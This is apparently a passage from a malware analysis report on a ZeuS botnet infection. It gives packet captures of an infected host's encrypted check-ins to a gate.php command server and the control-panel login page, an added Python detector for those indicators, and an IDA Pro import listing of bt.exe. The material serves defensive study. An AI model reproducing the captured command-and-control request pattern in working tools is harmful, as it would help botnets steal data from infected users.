308 7.584476 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
332 7.889639 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
333 7.892491 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0
334 7.893379 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
358 8.168568 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
359 8.169845 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
374 8.620548 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
376 8.623252 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
377 8.624013 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0
Next I used Statistics -> Conversations to narrow the information to the host and the
web server. From that you can see the basic summary of ports and how many
packets went from the host to the web server. We can also see that the host used 3709 different
ports while sending information back to the web server.
From Statistics -> Flow Graph we see that "gate.php" and "cp.php" are the primary files
that the host was requesting from the web server.
There is no other evident information from Wireshark showing the type of files
that the infected host is sending to the web server. Many XML files appear in
packets when looking at the file transfers from the server to the infected host. It appears that
every possible known port is attempted in order. From the Flow Graph sample output we see
ports itm-lm (ITM License Manager), silkp1, silkp2, silkp3, silkp4 and glishd. Most of the
payloads seem to have been encrypted before the data was transferred. This is seen in the
following sample TCP data stream outputs.
dellpwrappks:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:27:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
dx-instrument:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
post ucf gate pkt-krb-ipsec:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
dellwebadmin-2:
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=29
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 343
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
Content-Type: text/html
POST /ucf/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Content-Length: 255
Connection: Keep-Alive
Pragma: no-cache
[encrypted POST body omitted]
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:28:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
get:
GET /ucf/cp.php?m=login HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Pragma: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0
Pragma: no-cache
Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf
Vary: Accept-Encoding
Connection: close
Content-Type: application/xhtml+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>login</title>
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link rel="stylesheet" href="theme/style.css" type="text/css" />
</head>
<body>
<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"
style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"
valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input
type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td
align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"
style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input
type="checkbox" name="remember" value="1" /> Remember (MD5
cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"
value="Submit" /></td></tr></table></form>
</body>
</html>
sftsrv:
GET /ucf/cp.php?m=login HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.com
Pragma: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0
Pragma: no-cache
Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf
Vary: Accept-Encoding
Connection: close
Content-Type: application/xhtml+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>login</title>
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link rel="stylesheet" href="theme/style.css" type="text/css" />
</head>
<body>
<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"
style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"
valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input
type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td
align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"
style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input
type="checkbox" name="remember" value="1" /> Remember (MD5
cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"
value="Submit" /></td></tr></table></form>
</body>
</html>
From Wireshark we learned that there is a client-server relationship between the infected
host and the web server. We see a lot of ports being used to communicate back and forth.
There is no clear text found in the payloads to show us what the host is asking for or giving to
the web server. It looks like the web server is sending the host XML files. We see the main files
are "gate.php" and "cp.php".
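As an added example (not from the report), here is a small Python detector for the pattern the capture shows: POSTs to gate.php with an opaque body, GETs to cp.php, the bare MSIE 7 header set, and a fixed-interval check-in. The request bytes reuse the headers printed above, but the 255-byte body is a constructed stand-in for the encrypted payload, and the timestamps are the response Date values from the dx-instrument stream.

```python
from datetime import datetime

# User-Agent string the infected host sent on every request in the capture.
ZEUS_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"


def _opaque_body(length: int, seed: int) -> bytes:
    """Constructed stand-in for the encrypted gate.php body (same length, not the real bytes)."""
    return bytes((i * 97 + seed) & 0xFF for i in range(length))


# Constructed request: the header lines are those seen in the capture, the body is synthetic.
SAMPLE_POST = (
    b"POST /ucf/gate.php HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"
    b"Host: xxx.com\r\n"
    b"Content-Length: 255\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"\r\n"
) + _opaque_body(255, 13)

SAMPLE_GET = (
    b"GET /ucf/cp.php?m=login HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"
    b"Host: xxx.com\r\n"
    b"Pragma: no-cache\r\n"
    b"\r\n"
)

# Response Date values from the dx-instrument stream: three consecutive gate.php check-ins.
SAMPLE_TIMES = ["11:32:52", "11:32:58", "11:33:04"]


def parse_http_request(raw: bytes) -> dict:
    """Split one HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers, "body": body}


def printable_ratio(body: bytes) -> float:
    """Share of bytes that are printable ASCII or whitespace; encrypted data scores low."""
    if not body:
        return 1.0
    ok = sum(1 for b in body if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(body)


def score_request(req: dict) -> dict:
    """Return the ZeuS-style indicators a single request matches."""
    flags = []
    h = req["headers"]
    if req["method"] == "POST" and req["path"].endswith("/gate.php"):
        flags.append("zeus_gate_post")              # bot -> server drop-off endpoint
    if "/cp.php" in req["path"]:
        flags.append("zeus_cp_probe")               # control-panel login page fetch
    ratio = printable_ratio(req["body"])
    if req["body"] and ratio < 0.5 and "content-type" not in h:
        flags.append("opaque_post_body")            # binary body with no declared type
    if h.get("user-agent") == ZEUS_UA and "accept-language" not in h and "referer" not in h:
        flags.append("bare_browser_impersonation")  # a real IE7 also sends Accept-Language etc.
    return {"method": req["method"], "path": req["path"], "body_len": len(req["body"]),
            "printable_ratio": round(ratio, 2), "flags": flags}


def beacon_intervals(times: list) -> list:
    """Seconds between consecutive check-ins, given HH:MM:SS strings from one day."""
    stamps = sorted(datetime.strptime(t, "%H:%M:%S") for t in times)
    return [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]


def is_periodic(intervals: list, jitter: float = 1.0) -> bool:
    """True when every gap is within `jitter` seconds of every other gap (a fixed timer)."""
    return len(intervals) >= 2 and max(intervals) - min(intervals) <= jitter


if __name__ == "__main__":
    for raw in (SAMPLE_POST, SAMPLE_GET):
        print(score_request(parse_http_request(raw)))
    gaps = beacon_intervals(SAMPLE_TIMES)
    print("check-in gaps:", gaps, "periodic:", is_periodic(gaps))
```

The service names in the summary above (ica, cvc, liberty-lm, rfx-lm) are Wireshark's name resolution of the client's consecutive ephemeral source ports 1494-1497, so the rising port count reflects one new TCP connection per check-in rather than traffic to many services.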
IDA Pro 5
All the code that makes this ZeuS run correctly relies on the "zse.exe" and the "bt.exe"
executables. We can take a look at what is happening at the machine level and inspect the
comments in the code to find hints about what the program is supposed to do.
Both executables were analyzed with IDA Pro 5 to find out the inputs, outputs, text
comments, the type of compiler used to build the program and all the dependencies in the
code. The flow diagram for the "zse.exe" executable is very complex and would take more
than 6 months to trace through. The "bt.exe" executable flow diagram is more manageable,
but would also take an exhaustive amount of time to conquer. For this experiment the
focus was just to find the variables and functions and make educated assumptions based
on those findings.
bt.exe
The type of compiler used to build the program is vc6win Visual C++ v6.
F (dark blue) - regular function:
start 0040D70F
A (dark green) - ascii string:
aNpnitp2s_42Ucn 004010A0
a5hg5AD_fnvf9 00401A8C
aYx5RYaQlgy 00401B28
aFF2ms4dYIO 00401C1C
aQXLAd?fnXdqvdA 00401C44
aHaM_ 00401C63
aGn4v89Tnpcq9ki 00402C0C
aUhxp 0040360C
aEglEs?AkvucpLa 004037B1
aCV_bKv2a8p? 00403880
aHrnH8vD3GIuCdx 00403B30
aGsiNabQR6xE8yv 00403B78
a5cs8LFo3nymhn_ 00403BA1
a?fx9a65HEb 0040445C
I (purple) - imported name:
BuildTrusteeWithNameW 00413000
GetTrusteeNameA 00413004 BuildImpersonateTrusteeA 00413008
GetNamedSecurityInfoW 0041300C
CryptGetDefaultProviderA 00413010 CryptDuplicateKey 00413014
RegSetValueExW 00413018
DeregisterEventSource 0041301C BuildSecurityDescriptorA 00413020
InitiateSystemShutdownW 00413024
RegQueryMultipleValuesW 00413028 LookupAccountNameW 0041302C
RegSetKeySecurity 00413030
RegEnumValueW 00413034
SetServiceObjectSecurity 00413038
RegisterEventSourceA 0041303C
SetEntriesInAuditListW 00413040 BuildTrusteeWithSidW 00413044
RegLoadKeyW 00413048
GetOldestEventLogRecord 0041304C LookupAccountSidA 00413050
GetTrusteeTypeW 00413054
LookupPrivilegeNameA 00413058 CryptHashData 0041305C
ImpersonateNamedPipeClient 00413060
ObjectOpenAuditAlarmW 00413064 RegEnumKeyExA 00413068
BuildSecurityDescriptorW 0041306C
LookupPrivilegeValueA 00413070 DeleteAce 00413074
OpenProcessToken 00413078
DeleteService 0041307C CryptDecrypt 00413080
CreateProcessAsUserW 00413084
RevertToSelf 00413088 IsValidSecurityDescriptor 0041308C
RegReplaceKeyW 00413090
CryptAcquireContextW 00413094 LookupAccountSidW 00413098
SetEntriesInAccessListW 0041309C
RegDeleteValueA 004130A0 RegQueryValueExA 004130A4
GetSidIdentifierAuthority 004130A8
CryptGetHashParam 004130AC PrivilegedServiceAuditAlarmA 004130B0
BuildImpersonateExplicitAccessWithNameA 004130B4
GetLengthSid 004130B8
CryptImportKey 004130BC AllocateAndInitializeSid 004130C0
BuildImpersonateExplicitAccessWithNameW 004130C4
CryptSignHashW 004130C8
GetServiceDisplayNameA 004130CC
EnumDependentServicesA 004130D0 CryptReleaseContext 004130D4
GetExplicitEntriesFromAclW 004130D8
GetUserNameW 004130DC CryptEnumProvidersW 004130E0
FindFirstFreeAce 004130E4
CloseServiceHandle 004130E8 GetCurrentHwProfileW 004130EC
CancelOverlappedAccess 004130F0
StartServiceA 004130F4
GetKeyNameTextA 00413328
SetWindowPos 0041332C RegisterWindowMessageW 00413330
UnionRect 00413334
SetCaretBlinkTime 00413338 DestroyAcceleratorTable 0041333C
ChangeDisplaySettingsW 00413340
LoadImageA 00413344 SetMenuItemBitmaps 00413348
DdeUnaccessData 0041334C
DefWindowProcW 00413350 CreateIconFromResource 00413354
EditWndProc 00413358
ChangeMenuW 0041335C
DrawEdge 00413360
GetDlgItem 00413364
InternalGetWindowText 00413368 ChangeDisplaySettingsA 0041336C
InsertMenuW 00413370
SetMenuInfo 00413374 DdeSetUserHandle 00413378
GetMessageW 0041337C
ModifyMenuW 00413380 MsgWaitForMultipleObjectsEx 00413384
DrawAnimatedRects 00413388
GetUserObjectSecurity 0041338C GetMenuCheckMarkDimensions 00413390
GetMenu 00413394
DestroyCursor 00413398 IsDlgButtonChecked 0041339C
GetCaretBlinkTime 004133A0
GetShellWindow 004133A4 GetClipboardOwner 004133A8
CallWindowProcA 004133AC
GetWindowPlacement 004133B0 TabbedTextOutA 004133B4
LoadKeyboardLayoutW 004133B8
IsZoomed 004133BC CreateAcceleratorTableW 004133C0
FillRect 004133C4
RealGetWindowClass 004133C8 ToUnicodeEx 004133CC
OpenWindowStationW 004133D0
IsCharUpperA 004133D4 InvalidateRect 004133D8
GetMenuStringW 004133DC IsDialogMessageW 004133E0
ReleaseCapture 004133E4
GetSystemMenu 004133E8 SetCapture 004133EC
GrayStringA 004133F0
SwitchDesktop 004133F4
SetRect 004133F8
GetUpdateRgn 004133FC
GetDlgItemInt 00413400 LoadMenuA 00413404
CoCreateInstance 0041340C
CoRegisterMessageFilter 00413410 OleCreateLink 00413414
OleCreateEx 00413418
OleLoad 0041341C GetConvertStg 00413420
CoQueryReleaseObject 00413424
CreateDataAdviseHolder 00413428
PathFindExtensionA 00413658
SHRegGetUSValueW 0041365C UrlGetPartA 00413660
StrToIntA 00413664
StrCSpnW 00413668 PathMakeSystemFolderA 0041366C
PathFileExistsW 00413670
PathGetCharTypeA 00413674 StrRStrIW 00413678
UrlCombineW 0041367C
SHRegCreateUSKeyW 00413680 PathGetCharTypeW 00413684
PathSetDlgItemPathW 00413688
UrlCanonicalizeA 0041368C
PathIsFileSpecW 00413690
PathIsSystemFolderA 00413694
PathBuildRootW 00413698 SHRegDeleteEmptyUSKeyA 0041369C
ChrCmpIW 004136A0
SHRegGetBoolUSValueA 004136A4 PathFindFileNameA 004136A8
SHIsLowMemoryMachine 004136AC
UrlUnescapeA 004136B0 SHRegDuplicateHKey 004136B4
SHDeleteKeyW 004136B8
StrStrIW 004136BC UrlCanonicalizeW 004136C0
SHEnumKeyExW 004136C4
PathCompactPathA 004136C8 PathSkipRootA 004136CC
PathUnmakeSystemFolderW 004136D0
StrToIntExW 004136D4 PathQuoteSpacesA 004136D8
PathSearchAndQualifyA 004136DC
SHQueryValueExW 004136E0 PathRemoveArgsW 004136E4
PathFindNextComponentW 004136E8
PathIsUNCA 004136EC PathIsContentTypeA 004136F0
StrRetToBufW 004136F4
PathFindFileNameW 004136F8 SHRegDeleteUSValueA 004136FC
SHDeleteValueW 00413700
StrCSpnIA 00413704 PathCommonPrefixW 00413708
PathIsPrefixW 0041370C UrlIsNoHistoryW 00413710
SHCopyKeyW 00413714
SHDeleteKeyA 00413718 SHRegSetUSValueW 0041371C
PathRelativePathToA 00413720
PathMakePrettyW 00413724
PathAppendA 00413728
UrlIsNoHistoryA 0041372C
EnumCalendarInfoExA 00413734 Module32Next 00413738
EnumSystemLocalesW 0041373C
Heap32ListNext 00413740 GetUserDefaultLCID 00413744
EnumTimeFormatsA 00413748
lstrcmpiA 0041374C GetQueuedCompletionStatus 00413750
FreeLibrary 00413754
EnumSystemLocalesA 00413758
RegCloseKey 004130F8
RegQueryValueA 004130FC CryptVerifySignatureW 00413100
AdjustTokenPrivileges 00413104
QueryServiceStatus 00413108 RegConnectRegistryA 0041310C
GetTokenInformation 00413110
GetAccessPermissionsForObjectW 00413114 RegQueryValueW 00413118
AccessCheckAndAuditAlarmW 0041311C
SetSecurityDescriptorSacl 00413120 AreAnyAccessesGranted 00413124
ObjectCloseAuditAlarmA 00413128
QueryServiceConfigA 0041312C ClearEventLogW 00413130
RegUnLoadKeyA 00413134
LookupPrivilegeNameW 00413138 GetSecurityInfo 0041313C
RegEnumKeyExW 00413140
ObjectPrivilegeAuditAlarmW 00413144
GetTrusteeTypeA 00413148
RegOpenKeyExW 0041314C
RegCreateKeyA 00413150 IsTextUnicode 00413154
OpenEventLogW 00413158
CryptEnumProviderTypesW 0041315C RegRestoreKeyW 00413160
CryptGetProvParam 00413164
ChangeServiceConfigA 00413168 RegSaveKeyA 0041316C
BuildExplicitAccessWithNameW 00413170
GetSecurityDescriptorSacl 00413174 RegLoadKeyA 00413178
GetMultipleTrusteeA 0041317C
AddAccessAllowedAce 00413180 SetAclInformation 00413184
ControlService 00413188
GetSecurityInfoExW 0041318C RegRestoreKeyA 00413190
ObjectOpenAuditAlarmA 00413194
CopySid 00413198 OpenSCManagerA 0041319C
RegQueryMultipleValuesA 004131A0
OpenThreadToken 004131A4 LogonUserW 004131A8
CryptDestroyHash 004131AC
AbortSystemShutdownW 004131B0 GetAclInformation 004131B4
CreateServiceW 004131B8
CryptGenKey 004131BC LookupSecurityDescriptorPartsW 004131C0
ConvertAccessToSecurityDescriptorA 004131C4 SetEntriesInAccessListA 004131C8
AbortSystemShutdownA 004131CC
SetEntriesInAclW 004131D0 GetFileSecurityA 004131D4
OpenEventLogA 004131D8
CryptSetHashParam 004131DC
CryptSetProviderExA 004131E0
QueryServiceConfigW 004131E4
CryptSetProviderExW 004131E8 OpenBackupEventLogW 004131EC
SendMessageTimeoutW 004131F4
TileChildWindows 004131F8 EndTask 004131FC
IsDialogMessageA 00413200
DdeQueryNextServer 00413204 FlashWindowEx 00413208
GetKeyboardLayoutNameA 0041320C
DdeFreeDataHandle 00413210
CoGetInterfaceAndReleaseStream 0041342C
WriteClassStm 00413430 StgGetIFillLockBytesOnFile 00413434
OleBuildVersion 00413438
OleRegEnumFormatEtc 0041343C GetRunningObjectTable 00413440
UtGetDvtd32Info 00413444
OleCreateStaticFromData 00413448 OleCreateFromFile 0041344C
OleDoAutoConvert 00413450
OpenOrCreateStream 00413454 OleNoteObjectVisible 00413458
CreateAntiMoniker 0041345C
OleMetafilePictFromIconAndLabel 00413460 CoUnmarshalInterface 00413464
OleCreateEmbeddingHelper 00413468
CoRegisterClassObject 0041346C FreePropVariantArray 00413470
OleSetAutoConvert 00413474
OleTranslateAccelerator 00413478
OleSaveToStream 0041347C
CoGetTreatAsClass 00413480
CoRevertToSelf 00413484 CoInitializeEx 00413488
OleIsCurrentClipboard 0041348C
OleConvertIStorageToOLESTREAMEx 00413490
CoGetCurrentLogicalThreadId 00413494
CreateItemMoniker 00413498 CoGetMalloc 0041349C
WriteClassStg 004134A0
ReadStringStream 004134A4 CreateGenericComposite 004134A8
PropVariantCopy 004134AC
StgOpenStorageEx 004134B0 OleSave 004134B4
IsAccelerator 004134B8
BindMoniker 004134BC CoGetCallContext 004134C0
CoFreeUnusedLibraries 004134C4
StgOpenStorage 004134C8 UpdateDCOMSettings 004134CC
CoGetMarshalSizeMax 004134D0
OleGetIconOfFile 004134D4 StgOpenStorageOnILockBytes 004134D8
CoQueryProxyBlanket 004134DC
UtConvertDvtd16toDvtd32 004134E0 CoQueryAuthenticationServices 004134E4
OleSetClipboard 004134E8
DoDragDrop 004134EC IsEqualGUID 004134F0
CoReleaseMarshalData 004134F4 OleCreate 004134F8
CoQueryClientBlanket 004134FC
ReadClassStm 00413500 ReleaseStgMedium 00413504
CreateFileMoniker 00413508
OleSetMenuDescriptor 0041350C
CreatePointerMoniker 00413510
CoTreatAsClass 00413514
CoFreeAllLibraries 00413518 StgGetIFillLockBytesOnILockBytes 0041351C
CreateILockBytesOnHGlobal 00413520
CreateObjrefMoniker 00413524 CreateBindCtx 00413528
StringFromIID 0041352C
CoInitializeSecurity 00413530 CoBuildVersion 00413534
WriteStringStream 00413538
CoCreateFreeThreadedMarshaler 0041353C
Thread32First 0041375C
GetNamedPipeInfo 00413760 GlobalUnlock 00413764
FreeEnvironmentStringsA 00413768
GlobalFree 0041376C GetCurrentThread 00413770
PeekConsoleInputA 00413774
FindResourceExA 00413778 VirtualProtect 0041377C
OpenProcess 00413780
GetSystemDefaultLangID 00413784 GetEnvironmentStringsA 00413788
VirtualAlloc 0041378C
HeapLock 00413790 ConvertDefaultLocale 00413794
SetVolumeLabelW 00413798
SizeofResource 0041379C SetFileApisToOEM 004137A0
FileTimeToLocalFileTime 004137A4
GetFullPathNameW 004137A8
GetDiskFreeSpaceW 004137AC
SetSystemTime 004137B0
EnumDateFormatsExW 004137B4 CallNamedPipeA 004137B8
FindCloseChangeNotification 004137BC
SetEvent 004137C0 SetProcessPriorityBoost 004137C4
IsBadWritePtr 004137C8
TerminateThread 004137CC EnumResourceTypesW 004137D0
GetPrivateProfileIntW 004137D4
OpenFileMappingA 004137D8 CopyFileA 004137DC
lstrcpyn 004137E0
ReadConsoleW 004137E4 PeekNamedPipe 004137E8
CreateNamedPipeW 004137EC
CreateDirectoryExA 004137F0 SetThreadLocale 004137F4
ClearCommBreak 004137F8
SetStdHandle 004137FC GetNumberOfConsoleMouseButtons 00413800
GetFileAttributesExW 00413804
WriteConsoleOutputW 00413808 FlushViewOfFile 0041380C
PulseEvent 00413810
GetLocalTime 00413814 GetWindowsDirectoryA 00413818
SetCommConfig 0041381C
GetFileAttributesW 00413820 GetConsoleTitleA 00413824
